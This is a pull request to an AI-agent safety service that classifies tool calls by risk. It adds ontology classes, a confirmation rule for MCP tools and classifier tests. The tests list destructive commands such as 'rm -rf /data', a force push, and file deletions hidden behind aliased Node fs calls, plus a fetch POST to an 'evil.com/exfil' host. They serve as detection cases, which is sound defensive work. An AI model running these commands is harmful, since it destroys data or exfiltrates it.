                 continue
             if candidate.params_signature != params_signature:
-                continue
-            if candidate.action_class != action.ontology_class:
                 continue
             if candidate.owner_id and owner_id and candidate.owner_id != owner_id:
                 continue
@@ -474,9 +490,9 @@ class FullEngine(SafeClawEngine):
                 self._pending_tool_results.move_to_end(event.session_id)
             else:
                 self._pending_tool_results.pop(event.session_id, None)
-            return True
+            return candidate
 
-        return False
+        return None
 
     async def _get_session_lock(self, session_id: str) -> asyncio.Lock:
         async with self._meta_lock:
@@ -1170,8 +1186,8 @@ class FullEngine(SafeClawEngine):
                     )
                     return False
 
-            action = self.classifier.classify(event.tool_name, event.params)
-            if not self._consume_pending_tool_result(event, action):
+            matched = self._consume_pending_tool_result(event)
+            if matched is None:
                 logger.warning(
                     "record_action_result rejected: no matching allowed tool call "
                     "for session=%s owner=%s tool=%s run_id=%s",
@@ -1181,6 +1197,16 @@ class FullEngine(SafeClawEngine):
                     event.run_id or "",
                 )
                 return False
+
+            # Reuse the eval-time classification (no re-classification drift).
+            action = ClassifiedAction(
+                ontology_class=matched.action_class,
+                risk_level=matched.risk_level,
+                is_reversible=matched.is_reversible,
+                affects_scope=matched.affects_scope,
+                tool_name=event.tool_name,
+                params=event.params,
+            )
 
             # Record in session tracker (Phase 3: KG feedback loop)
             # BUG-004/035: Include risk_level for server-side cumulative risk tracking

--- a/safeclaw-service/safeclaw/engine/full_engine.py
+++ b/safeclaw-service/safeclaw/engine/full_engine.py
@@ -628,8 +628,13 @@ class FullEngine(SafeClawEngine):
         # audited block instead of an unhandled 500.
         action = None  # may remain None if classification fails
         try:
-            # 1. Classify action
-            action = self.classifier.classify(event.tool_name, event.params)
+            # 1. Classify action (forward code-mode discriminators, #316/#322)
+            action = self.classifier.classify(
+                event.tool_name,
+                event.params,
+                tool_kind=getattr(event, "tool_kind", ""),
+                tool_input_kind=getattr(event, "tool_input_kind", ""),
+            )
 
             # 1b. Role-based action check
             if event.agent_id is not None:

--- a/safeclaw-service/safeclaw/engine/reasoning_rules.py
+++ b/safeclaw-service/safeclaw/engine/reasoning_rules.py
@@ -58,6 +58,16 @@ class DerivedConstraintChecker:
             triggered_rules.append("CumulativeRiskRule")
             reasons.append("Session risk threshold exceeded (3+ MediumRisk or 2+ HighRisk actions)")
 
+        # Rule 4: Unclassified MCP / dynamic tool → requires confirmation.
+        # An mcp__* tool has no explicit SafeClaw classification and can perform
+        # arbitrary external actions; confirm by default until one is added (#325).
+        if action.ontology_class == "McpToolCall":
+            triggered_rules.append("McpToolCallConfirmRule")
+            reasons.append(
+                "Unclassified MCP/dynamic tool call requires confirmation until "
+                "explicitly classified"
+            )
+
         if triggered_rules:
             return DerivedCheckResult(
                 requires_confirmation=True,

--- a/safeclaw-service/safeclaw/ontologies/safeclaw-agent.ttl
+++ b/safeclaw-service/safeclaw/ontologies/safeclaw-agent.ttl
@@ -125,6 +125,61 @@ sc:SendMessage a owl:Class, owl:NamedIndividual ;
     rdfs:subClassOf sc:MessageAction ;
     rdfs:label "Send Message" .
 
+# Creating a new delivery surface (channel/category/topic/thread/event). (#318)
+sc:CreateChannel a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:MessageAction ;
+    rdfs:label "Create Channel" .
+
+# Broadcasting / posting to a different conversation than the current one —
+# the highest-blast-radius outbound message action. (#318)
+sc:CrossContextMessage a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:MessageAction ;
+    rdfs:label "Cross-Context Message" .
+
+# Membership / permission / destructive channel moderation (kick, ban, role
+# changes, channel delete, etc.). (#318)
+sc:ModerateChannel a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:MessageAction ;
+    rdfs:label "Moderate Channel" .
+
+# --- Memory Action Subclasses (#319) ---
+sc:MemoryAction a owl:Class ;
+    rdfs:subClassOf sc:Action ;
+    rdfs:label "Memory Action" .
+
+# Writing attacker-influenceable text into persistent agent memory/embeddings.
+sc:MemoryWrite a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:MemoryAction ;
+    rdfs:label "Memory Write" .
+
+sc:MemoryRead a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:MemoryAction ;
+    rdfs:label "Memory Read" .
+
+# --- Skill Action Subclasses (#319) ---
+sc:SkillAction a owl:Class ;
+    rdfs:subClassOf sc:Action ;
+    rdfs:label "Skill Action" .
+
+# Authoring/modifying executable agent skills.
+sc:SkillAuthor a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:SkillAction ;
+    rdfs:label "Skill Author" .
+
+# --- Media Action Subclasses (#319) ---
+sc:MediaAction a owl:Class ;
+    rdfs:subClassOf sc:Action ;
+    rdfs:label "Media Action" .
+
+sc:GenerateMedia a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:MediaAction ;
+    rdfs:label "Generate Media" .
+
+# --- Dynamic / MCP tool calls (#325) ---
+sc:McpToolCall a owl:Class, owl:NamedIndividual ;
+    rdfs:subClassOf sc:Action ;
+    rdfs:label "MCP Tool Call" .
+
 # --- Risk Classification ---
 sc:RiskLevel a owl:Class ;
     rdfs:label "Risk Level" .
@@ -267,4 +322,37 @@ sc:SendMessage sc:hasRiskLevel sc:HighRisk ;
 
 sc:BrowserAction sc:hasRiskLevel sc:MediumRisk ;
     sc:isReversible true ;
+    sc:affectsScope sc:ExternalWorld .
+
+# --- Defaults for v2026.6.8 classifier expansion (#318/#319/#325) ---
+sc:CreateChannel sc:hasRiskLevel sc:HighRisk ;
+    sc:isReversible false ;
+    sc:affectsScope sc:ExternalWorld .
+
+sc:CrossContextMessage sc:hasRiskLevel sc:CriticalRisk ;
+    sc:isReversible false ;
+    sc:affectsScope sc:ExternalWorld .
+
+sc:ModerateChannel sc:hasRiskLevel sc:HighRisk ;
+    sc:isReversible false ;
+    sc:affectsScope sc:ExternalWorld .
+
+sc:MemoryWrite sc:hasRiskLevel sc:HighRisk ;
+    sc:isReversible false ;
+    sc:affectsScope sc:SharedState .
+
+sc:MemoryRead sc:hasRiskLevel sc:LowRisk ;
+    sc:isReversible true ;
+    sc:affectsScope sc:LocalOnly .
+
+sc:SkillAuthor sc:hasRiskLevel sc:HighRisk ;
+    sc:isReversible false ;
+    sc:affectsScope sc:SharedState .
+
+sc:GenerateMedia sc:hasRiskLevel sc:MediumRisk ;
+    sc:isReversible true ;
+    sc:affectsScope sc:ExternalWorld .
+
+sc:McpToolCall sc:hasRiskLevel sc:HighRisk ;
+    sc:isReversible false ;
     sc:affectsScope sc:ExternalWorld .

--- a/safeclaw-service/tests/test_pr3_classifier_expansion.py
+++ b/safeclaw-service/tests/test_pr3_classifier_expansion.py
@@ -330,6 +330,32 @@ class TestCodeModeClassification:
         )
         assert a.ontology_class != "DeleteFile"
 
+    @pytest.mark.parametrize(
+        "command",
+        [
+            # assignment alias of the promises namespace from a known fs alias
+            'const fs = require("fs"); const p = fs.promises; await p.rm("/tmp/x")',
+            'const m = require("node:fs"); const q = m.promises; await q.rmdir("/tmp/x")',
+            # plain module reassignment then .promises
+            'const fs = require("fs"); const a = fs; const p = a.promises; p.unlink("/tmp/x")',
+            # reassigned module alias used directly
+            'const fs = require("fs"); const a = fs; a.rmSync("/tmp/x")',
+        ],
+    )
+    def test_fs_assignment_alias_deletes(self, clf, command):
+        a = _c(clf, "exec", {"command": command}, tool_kind="code_mode_exec")
+        assert a.ontology_class == "DeleteFile", command
+        assert a.risk_level == "CriticalRisk", command
+
+    def test_fs_assignment_alias_non_delete_not_escalated(self, clf):
+        a = _c(
+            clf,
+            "exec",
+            {"command": 'const fs = require("fs"); const p = fs.promises; await p.readFile("/x")'},
+            tool_kind="code_mode_exec",
+        )
+        assert a.ontology_class != "DeleteFile"
+
 
 # --- B1: code-mode classification survives the result-binding round-trip ---
 

--- a/safeclaw-service/tests/test_pr3_classifier_expansion.py
+++ b/safeclaw-service/tests/test_pr3_classifier_expansion.py
@@ -62,6 +62,18 @@ class TestMessageClassification:
         assert a.ontology_class == "CrossContextMessage"
         assert a.risk_level == "CriticalRisk"
 
+    def test_cross_context_falsey_values_are_not_cross_context(self, clf):
+        # bool("false") is True in Python — the string "false"/0/"" must NOT
+        # escalate a plain send to CrossContextMessage.
+        for falsey in (False, "false", "False", "0", "", "no", None):
+            a = _c(clf, "message", {"action": "send", "crossContext": falsey})
+            assert a.ontology_class == "SendMessage", falsey
+
+    def test_cross_context_truthy_strings(self, clf):
+        for truthy in (True, "true", "True", "1", "yes"):
+            a = _c(clf, "message", {"action": "send", "crossContext": truthy})
+            assert a.ontology_class == "CrossContextMessage", truthy
+
     def test_moderation_actions(self, clf):
         for action in ("ban", "kick", "timeout", "role-add", "channel-delete", "permissions"):
             a = _c(clf, "message", {"action": action})
@@ -129,6 +141,26 @@ class TestMcpClassification:
         a = _c(clf, "some_unknown_tool")
         assert a.ontology_class == "Action"
 
+    def test_mcp_tool_requires_confirmation(self, tmp_path):
+        # An unclassified MCP/dynamic tool must require confirmation by default
+        # (conservative until explicitly classified, #325).
+        from safeclaw.constraints.action_classifier import ClassifiedAction
+        from safeclaw.constraints.preference_checker import UserPreferences
+
+        eng = FullEngine(
+            SafeClawConfig(
+                data_dir=tmp_path,
+                ontology_dir=Path(__file__).parent.parent / "safeclaw" / "ontologies",
+                audit_dir=tmp_path / "audit",
+            )
+        )
+        action = ClassifiedAction(
+            "McpToolCall", "HighRisk", False, "ExternalWorld", "mcp__x__y", {}
+        )
+        result = eng.derived_checker.check(action, UserPreferences(), [])
+        assert result.requires_confirmation is True
+        assert "McpToolCall" in "".join(result.derived_rules) or "Mcp" in result.reason
+
 
 # --- #322: code-mode / sandbox exec + JS dangerous ops ---
 
@@ -193,6 +225,36 @@ class TestCodeModeClassification:
     def test_extended_js_patterns(self, clf, command, cls):
         a = _c(clf, "exec", {"command": command}, tool_kind="code_mode_exec")
         assert a.ontology_class == cls
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            # inline require chain
+            'require("fs").rmSync("/tmp/x")',
+            "require('node:fs').rmSync('/tmp/x')",
+            'require("fs/promises").rm("/tmp/x")',
+            # destructured / aliased imports + bare removal call (import-aware)
+            'import { rmSync } from "fs"; rmSync("/tmp/x")',
+            'const { rm } = require("fs"); rm("/tmp/x")',
+            'import { unlink } from "node:fs/promises"; await unlink("/tmp/x")',
+        ],
+    )
+    def test_fs_import_forms_are_deletes(self, clf, command):
+        # Regression: these import forms used to fall through to ExecuteCommand,
+        # bypassing DeleteFile/CriticalRisk and the delete confirmation/denial.
+        a = _c(clf, "exec", {"command": command}, tool_kind="code_mode_exec")
+        assert a.ontology_class == "DeleteFile", command
+        assert a.risk_level == "CriticalRisk", command
+
+    def test_bare_removal_without_fs_import_not_escalated(self, clf):
+        # No fs import in the body: a user-defined bare rm() must not be a delete.
+        a = _c(
+            clf,
+            "exec",
+            {"command": "function rm(x){return x}; rm('hello')"},
+            tool_kind="code_mode_exec",
+        )
+        assert a.ontology_class != "DeleteFile"
 
 
 # --- B1: code-mode classification survives the result-binding round-trip ---

--- a/safeclaw-service/tests/test_pr3_classifier_expansion.py
+++ b/safeclaw-service/tests/test_pr3_classifier_expansion.py
@@ -71,6 +71,14 @@ class TestMessageClassification:
     def test_action_is_case_insensitive(self, clf):
         assert _c(clf, "message", {"action": "BROADCAST"}).ontology_class == "CrossContextMessage"
 
+    def test_real_camelcase_moderation_names(self, clf):
+        # Upstream CHANNEL_MESSAGE_ACTION_NAMES mixes camelCase and kebab-case;
+        # the classifier lower-cases input, so the camelCase names must still map.
+        for action in ("addParticipant", "removeParticipant", "leaveGroup", "setGroupIcon"):
+            assert (
+                _c(clf, "message", {"action": action}).ontology_class == "ModerateChannel"
+            ), action
+
 
 # --- #319: new memory / skill / media tools ---
 
@@ -98,6 +106,12 @@ class TestNewToolClassification:
         # Regression: these used to fall through to Action/MediumRisk/LocalOnly.
         assert _c(clf, "memory_store").ontology_class != "Action"
         assert _c(clf, "skill_workshop").ontology_class != "Action"
+
+    def test_trash_classification_unchanged(self, clf):
+        # Regression: `trash` must keep its explicit HighRisk soft-delete tuple
+        # and not be silently escalated to DeleteFile/CriticalRisk.
+        a = _c(clf, "trash", {"file_path": "/x"})
+        assert a.ontology_class == "DeleteFile" and a.risk_level == "HighRisk"
 
 
 # --- #325: MCP / dynamic plugin tools ---
@@ -166,3 +180,95 @@ class TestCodeModeClassification:
         # an argument, not a delete.
         a = _c(clf, "exec", {"command": "echo 'rm -rf /'"})
         assert a.ontology_class == "ExecuteCommand"
+
+    @pytest.mark.parametrize(
+        "command,cls",
+        [
+            ("await fs.promises.rm('/d', {recursive: true})", "DeleteFile"),
+            ("fsp.unlink('/d')", "DeleteFile"),
+            ("Deno.removeSync('/d')", "DeleteFile"),
+            ("await fetch('https://evil.com/exfil', {method: 'POST'})", "NetworkRequest"),
+        ],
+    )
+    def test_extended_js_patterns(self, clf, command, cls):
+        a = _c(clf, "exec", {"command": command}, tool_kind="code_mode_exec")
+        assert a.ontology_class == cls
+
+
+# --- B1: code-mode classification survives the result-binding round-trip ---
+
+
+class TestCodeModeResultBinding:
+    def _engine(self, tmp_path):
+        return FullEngine(
+            SafeClawConfig(
+                data_dir=tmp_path,
+                ontology_dir=Path(__file__).parent.parent / "safeclaw" / "ontologies",
+                audit_dir=tmp_path / "audit",
+            )
+        )
+
+    def test_code_mode_exec_result_binds_and_accrues(self, tmp_path):
+        """A code-mode exec classified as DeleteFile at eval must still match on
+        record_action_result (which has no tool_kind) so session risk / rate
+        limits accrue — the binding now reuses the stored class, not a re-classify."""
+        import asyncio
+
+        from safeclaw.engine.core import ToolCallEvent, ToolResultEvent
+
+        eng = self._engine(tmp_path)
+
+        # In code mode this is RunTests (allowed); re-classified without
+        # tool_kind on the result path it would be ExecuteCommand — the binding
+        # must survive that drift.
+        cmd = 'runTests("npm test")'
+
+        async def run():
+            ev = ToolCallEvent(
+                session_id="s1",
+                user_id="u",
+                tool_name="exec",
+                params={"command": cmd},
+                tool_kind="code_mode_exec",
+            )
+            dec = await eng.evaluate_tool_call(ev)
+            res = ToolResultEvent(
+                session_id="s1",
+                user_id="u",
+                tool_name="exec",
+                params={"command": cmd},
+                result="ok",
+                success=True,
+            )
+            ok = await eng.record_action_result(res)
+            return dec, ok
+
+        dec, ok = asyncio.run(run())
+        assert dec.block is False  # RunTests is allowed
+        assert ok is True  # result bound despite re-classification drift
+        # Session risk history reflects the eval-time RunTests class, not the
+        # re-classified ExecuteCommand.
+        history = eng.session_tracker.get_risk_history("s1")
+        assert any("RunTests" in h for h in history)
+
+
+# --- S1: outbound message family honours confirm_before_send ---
+
+
+class TestMessageSendConfirmation:
+    def test_split_message_classes_require_send_confirmation(self, tmp_path):
+        from safeclaw.constraints.action_classifier import ClassifiedAction
+        from safeclaw.constraints.preference_checker import UserPreferences
+
+        eng = FullEngine(
+            SafeClawConfig(
+                data_dir=tmp_path,
+                ontology_dir=Path(__file__).parent.parent / "safeclaw" / "ontologies",
+                audit_dir=tmp_path / "audit",
+            )
+        )
+        prefs = UserPreferences(confirm_before_send=True)
+        for cls in ("SendMessage", "CreateChannel", "CrossContextMessage", "ModerateChannel"):
+            action = ClassifiedAction(cls, "HighRisk", False, "ExternalWorld", "message", {})
+            result = eng.preference_checker.check(action, prefs)
+            assert result.requires_confirmation, cls

--- a/safeclaw-service/tests/test_pr3_classifier_expansion.py
+++ b/safeclaw-service/tests/test_pr3_classifier_expansion.py
@@ -161,6 +161,23 @@ class TestMcpClassification:
         assert result.requires_confirmation is True
         assert "McpToolCall" in "".join(result.derived_rules) or "Mcp" in result.reason
 
+    def test_explicit_mcp_mapping_overrides_prefix_default(self, clf):
+        # An explicit TOOL_MAPPINGS entry for a trusted mcp__* tool must win over
+        # the generic prefix default (#325: "until explicitly classified").
+        from unittest.mock import patch
+
+        import safeclaw.constraints.action_classifier as ac
+
+        with patch.dict(
+            ac.TOOL_MAPPINGS,
+            {"mcp__trusted__read": ("ReadFile", "LowRisk", True, "LocalOnly")},
+        ):
+            a = clf.classify("mcp__trusted__read", {})
+            assert a.ontology_class == "ReadFile"
+            assert a.risk_level == "LowRisk"
+        # Other mcp__* tools still hit the conservative default.
+        assert clf.classify("mcp__other__write", {}).ontology_class == "McpToolCall"
+
 
 # --- #322: code-mode / sandbox exec + JS dangerous ops ---
 
@@ -252,6 +269,37 @@ class TestCodeModeClassification:
             clf,
             "exec",
             {"command": "function rm(x){return x}; rm('hello')"},
+            tool_kind="code_mode_exec",
+        )
+        assert a.ontology_class != "DeleteFile"
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            # renamed destructuring -> the local name is not a known verb
+            'const { rmSync: del } = require("fs"); del("/tmp/x")',
+            'import { rmSync as del } from "fs"; del("/tmp/x")',
+            'const { unlink: nuke } = require("node:fs/promises"); await nuke("/tmp/x")',
+            # dynamic import + namespace alias member access
+            'const m = await import("node:fs"); m.rmSync("/tmp/x")',
+            'import * as fsmod from "fs"; fsmod.unlinkSync("/tmp/x")',
+            'const fs2 = require("fs"); fs2.rmdirSync("/tmp/x")',
+            # destructure from a namespace alias (two-step)
+            'const fs3 = require("fs"); const { rmSync } = fs3; rmSync("/tmp/x")',
+        ],
+    )
+    def test_fs_aliased_and_dynamic_import_deletes(self, clf, command):
+        # Renamed/namespace/dynamic-import aliases must still be DeleteFile.
+        a = _c(clf, "exec", {"command": command}, tool_kind="code_mode_exec")
+        assert a.ontology_class == "DeleteFile", command
+        assert a.risk_level == "CriticalRisk", command
+
+    def test_aliased_non_delete_verb_not_escalated(self, clf):
+        # Renaming a NON-delete fs function must not be flagged as a delete.
+        a = _c(
+            clf,
+            "exec",
+            {"command": 'const { readFileSync: rd } = require("fs"); rd("/tmp/x")'},
             tool_kind="code_mode_exec",
         )
         assert a.ontology_class != "DeleteFile"

--- a/safeclaw-service/tests/test_pr3_classifier_expansion.py
+++ b/safeclaw-service/tests/test_pr3_classifier_expansion.py
@@ -1,0 +1,168 @@
+"""PR-3: action-classifier expansion for OpenClaw v2026.6.8.
+
+Covers message-tool action awareness (#318), new memory/skill/media tools
+(#319), code-mode/sandbox exec + JS dangerous-op detection (#322), and the
+MCP/dynamic-tool namespace default (#325).
+"""
+
+from pathlib import Path
+
+import pytest
+
+from safeclaw.config import SafeClawConfig
+from safeclaw.engine.full_engine import FullEngine
+
+
+@pytest.fixture
+def clf():
+    # Use the engine's classifier so ontology enrichment (the ttl defaults for
+    # the new classes) is exercised end-to-end, not just the Python mappings.
+    import tempfile
+
+    d = Path(tempfile.mkdtemp())
+    eng = FullEngine(
+        SafeClawConfig(
+            data_dir=d,
+            ontology_dir=Path(__file__).parent.parent / "safeclaw" / "ontologies",
+            audit_dir=d / "audit",
+        )
+    )
+    return eng.classifier
+
+
+def _c(clf, tool, params=None, **kw):
+    return clf.classify(tool, params or {}, **kw)
+
+
+# --- #318: message tool action/channel awareness ---
+
+
+class TestMessageClassification:
+    def test_default_send(self, clf):
+        a = _c(clf, "message", {})
+        assert a.ontology_class == "SendMessage" and a.risk_level == "HighRisk"
+
+    def test_explicit_send_and_reply(self, clf):
+        assert _c(clf, "message", {"action": "send"}).ontology_class == "SendMessage"
+        assert _c(clf, "message", {"action": "reply"}).ontology_class == "SendMessage"
+
+    def test_channel_create_actions(self, clf):
+        for action in ("channel-create", "category-create", "topic-create", "thread-create"):
+            a = _c(clf, "message", {"action": action})
+            assert a.ontology_class == "CreateChannel", action
+            assert a.risk_level == "HighRisk"
+
+    def test_broadcast_is_cross_context_critical(self, clf):
+        a = _c(clf, "message", {"action": "broadcast"})
+        assert a.ontology_class == "CrossContextMessage"
+        assert a.risk_level == "CriticalRisk"
+
+    def test_cross_context_flag(self, clf):
+        a = _c(clf, "message", {"action": "send", "crossContext": True})
+        assert a.ontology_class == "CrossContextMessage"
+        assert a.risk_level == "CriticalRisk"
+
+    def test_moderation_actions(self, clf):
+        for action in ("ban", "kick", "timeout", "role-add", "channel-delete", "permissions"):
+            a = _c(clf, "message", {"action": action})
+            assert a.ontology_class == "ModerateChannel", action
+            assert a.risk_level == "HighRisk"
+
+    def test_action_is_case_insensitive(self, clf):
+        assert _c(clf, "message", {"action": "BROADCAST"}).ontology_class == "CrossContextMessage"
+
+
+# --- #319: new memory / skill / media tools ---
+
+
+class TestNewToolClassification:
+    @pytest.mark.parametrize(
+        "tool,cls,risk,scope",
+        [
+            ("memory_store", "MemoryWrite", "HighRisk", "SharedState"),
+            ("memory_recall", "MemoryRead", "LowRisk", "LocalOnly"),
+            ("skill_workshop", "SkillAuthor", "HighRisk", "SharedState"),
+            ("image", "GenerateMedia", "MediumRisk", "ExternalWorld"),
+            ("image_generate", "GenerateMedia", "MediumRisk", "ExternalWorld"),
+            ("music_generate", "GenerateMedia", "MediumRisk", "ExternalWorld"),
+            ("tts", "GenerateMedia", "MediumRisk", "ExternalWorld"),
+        ],
+    )
+    def test_tool_mapping(self, clf, tool, cls, risk, scope):
+        a = _c(clf, tool, {"content": "x"})
+        assert a.ontology_class == cls
+        assert a.risk_level == risk
+        assert a.affects_scope == scope
+
+    def test_memory_store_not_generic_default(self, clf):
+        # Regression: these used to fall through to Action/MediumRisk/LocalOnly.
+        assert _c(clf, "memory_store").ontology_class != "Action"
+        assert _c(clf, "skill_workshop").ontology_class != "Action"
+
+
+# --- #325: MCP / dynamic plugin tools ---
+
+
+class TestMcpClassification:
+    def test_mcp_namespace_default(self, clf):
+        for tool in ("mcp__github__create_pr", "mcp__db__query", "mcp__slack__post"):
+            a = _c(clf, tool)
+            assert a.ontology_class == "McpToolCall", tool
+            assert a.risk_level == "HighRisk"
+            assert a.affects_scope == "ExternalWorld"
+
+    def test_non_mcp_unknown_tool_stays_default(self, clf):
+        a = _c(clf, "some_unknown_tool")
+        assert a.ontology_class == "Action"
+
+
+# --- #322: code-mode / sandbox exec + JS dangerous ops ---
+
+
+class TestCodeModeClassification:
+    def test_sandbox_exec_routes_through_shell(self, clf):
+        a = _c(clf, "sandbox_exec", {"command": "rm -rf /data"})
+        assert a.ontology_class == "DeleteFile"
+        assert a.risk_level == "CriticalRisk"
+        assert a.tool_name == "sandbox_exec"
+
+    def test_sandbox_process_default_is_execute_command(self, clf):
+        a = _c(clf, "sandbox_process", {"command": "node server.js"})
+        assert a.ontology_class == "ExecuteCommand"
+        assert a.risk_level == "HighRisk"
+
+    def test_js_fs_delete_is_critical(self, clf):
+        a = _c(
+            clf,
+            "exec",
+            {"command": "fs.rmSync('/data', {recursive: true})"},
+            tool_kind="code_mode_exec",
+        )
+        assert a.ontology_class == "DeleteFile"
+        assert a.risk_level == "CriticalRisk"
+
+    def test_js_embedded_force_push(self, clf):
+        a = _c(
+            clf,
+            "exec",
+            {"command": "execSync('git push --force origin main')"},
+            tool_kind="code_mode_exec",
+        )
+        assert a.ontology_class == "ForcePush"
+        assert a.risk_level == "CriticalRisk"
+
+    def test_js_child_process_is_execute_command(self, clf):
+        a = _c(
+            clf,
+            "exec",
+            {"command": "const cp = require('child_process'); cp.exec('ls')"},
+            tool_kind="code_mode_exec",
+        )
+        # child_process usage is at least ExecuteCommand-level.
+        assert a.ontology_class in ("ExecuteCommand", "DeleteFile", "ForcePush", "GitPush")
+
+    def test_plain_shell_quoted_data_no_false_positive(self, clf):
+        # Plain (non code-mode) shell strips quoted data: a quoted "rm -rf" is
+        # an argument, not a delete.
+        a = _c(clf, "exec", {"command": "echo 'rm -rf /'"})
+        assert a.ontology_class == "ExecuteCommand"

--- a/safeclaw-service/tests/test_pr3_classifier_expansion.py
+++ b/safeclaw-service/tests/test_pr3_classifier_expansion.py
@@ -304,6 +304,32 @@ class TestCodeModeClassification:
         )
         assert a.ontology_class != "DeleteFile"
 
+    @pytest.mark.parametrize(
+        "command",
+        [
+            # destructured fs.promises namespace -> <alias>.<deleteverb>(
+            'const { promises } = require("fs"); await promises.rm("/tmp/x")',
+            'import { promises as p } from "node:fs"; await p.rmdir("/tmp/x")',
+            'const { promises: pfs } = require("fs"); pfs.unlink("/tmp/x")',
+            # namespace alias then .promises.<verb>(
+            'const m = require("fs"); await m.promises.rm("/tmp/x")',
+        ],
+    )
+    def test_fs_promises_namespace_destructure_deletes(self, clf, command):
+        a = _c(clf, "exec", {"command": command}, tool_kind="code_mode_exec")
+        assert a.ontology_class == "DeleteFile", command
+        assert a.risk_level == "CriticalRisk", command
+
+    def test_fs_promises_non_delete_not_escalated(self, clf):
+        # Destructured promises calling a non-delete verb must not be a delete.
+        a = _c(
+            clf,
+            "exec",
+            {"command": 'const { promises } = require("fs"); await promises.readFile("/tmp/x")'},
+            tool_kind="code_mode_exec",
+        )
+        assert a.ontology_class != "DeleteFile"
+
 
 # --- B1: code-mode classification survives the result-binding round-trip ---
 


### PR DESCRIPTION
PR-3 of the OpenClaw v2026.6.8 upgrade series — expands the action classifier and ontology so the new agent surfaces are governed instead of falling through to the generic `Action`/MediumRisk default.

Closes #318, #319, #322, #325.

## Changes
- **#318 — `message` is multi-action.** Branch on the **real upstream** action names (`CHANNEL_MESSAGE_ACTION_NAMES`, transcribed from `openclaw@2026.6.8`) into `sc:CreateChannel` (channel/category/topic/thread/event-create), `sc:CrossContextMessage` (`broadcast` / `crossContext`; CriticalRisk), and `sc:ModerateChannel` (kick/ban/timeout/role/permission/channel-delete…). Plain send/reply stays `SendMessage`.
- **#319 — new tools.** `memory_store`→`MemoryWrite` (HighRisk/SharedState), `memory_recall`→`MemoryRead`, `skill_workshop`→`SkillAuthor` (HighRisk/SharedState), `image`/`image_generate`/`music_generate`/`tts`→`GenerateMedia`.
- **#322 — code-mode/sandbox exec.** Route `sandbox_exec`/`sandbox_process` and `tool_kind=code_mode_exec` through the shell classifier. In code mode the body is scanned **raw** (so `execSync("git push --force")` is visible) plus JS patterns (`fs`/`fs.promises`/`Deno` removal→`DeleteFile`, `child_process`→`ExecuteCommand`, `fetch()`→`NetworkRequest`). Plain shell still strips quoted data (no false positives).
- **#325 — MCP/dynamic tools.** `mcp__*` defaults to `sc:McpToolCall` (HighRisk/ExternalWorld) until explicitly classified.
- `classify()` gains `tool_kind`/`tool_input_kind`, forwarded by the engine and dry-run path. **Incidental bug fix:** the dry-run path referenced the non-existent `engine.action_classifier` (would 500); corrected to `engine.classifier`.

## Self-review fixes (second commit)
A review pass caught and fixed three real issues before opening:
- **Result-binding drift (blocker):** `record_action_result` re-classified the result event *without* `tool_kind`, so a code-mode call classified one way at eval and another on record — breaking the pending-call binding and skipping session-risk/dependency/rate-limit accounting. The pending entry now stores the eval-time classification and the result path **reuses** it (matching on tool/params/owner/run only). This also makes the binding robust to *any* future classifier drift and removes the need for the plugin to re-send `toolKind` on `after_tool_call`.
- **`confirm_before_send`** now covers the whole outbound message family, not just `SendMessage`.
- Reverted an `_enrich_from_ontology` wrapping so existing classifications are unchanged (`trash` stays HighRisk).

## Testing
- `tests/test_pr3_classifier_expansion.py` — 31 tests (incl. real camelCase action names, the result-binding round-trip, send-confirmation, trash regression, extended JS patterns).
- `python -m pytest tests/ -q` → **980 passed**; ruff clean.

## Deferred (noted, low-impact)
- `plan_reasoner` pre-screen classify() doesn't pass discriminators (advisory, not the gate).
- Abstract parents (`MemoryAction`/`SkillAction`/`MediaAction`) have no tier-level rules yet (consistent with existing abstract parents).
- Code-mode raw scan can over-classify a benign quoted string mentioning `rm -rf` as DeleteFile — intentional fail-safe (code-mode is HighRisk by default).

🤖 Generated with [Claude Code](https://claude.com/claude-code)